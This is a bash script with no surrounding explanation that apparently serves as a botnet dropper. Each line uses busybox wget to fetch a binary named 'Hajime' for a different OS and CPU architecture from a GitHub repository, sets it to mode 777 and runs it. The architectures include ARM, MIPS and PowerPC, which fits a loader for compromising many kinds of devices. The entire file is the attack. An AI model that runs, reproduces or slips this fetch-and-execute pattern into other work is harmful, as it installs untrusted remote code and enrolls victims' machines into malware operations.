#!/bin/bash
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-darwin-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-darwin-arm64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-dragonfly-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-freebsd-386; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-freebsd-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-freebsd-arm; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-386; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-arm; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-arm64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-armv5; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-armv6; /bin/busybox  chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-armv7; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-mips; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-mips64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-mips64le; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-mipsle; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-ppc64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-linux-ppc64le; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-netbsd-386; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-netbsd-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-netbsd-arm; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-openbsd-386; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-openbsd-amd64; /bin/busybox chmod 777 oink; ./oink .
/bin/busybox wget -O oink https://raw.githubusercontent.com/aaaaa214432/w/main/Hajime-openbsd-arm; /bin/busybox chmod 777 oink; ./oink .
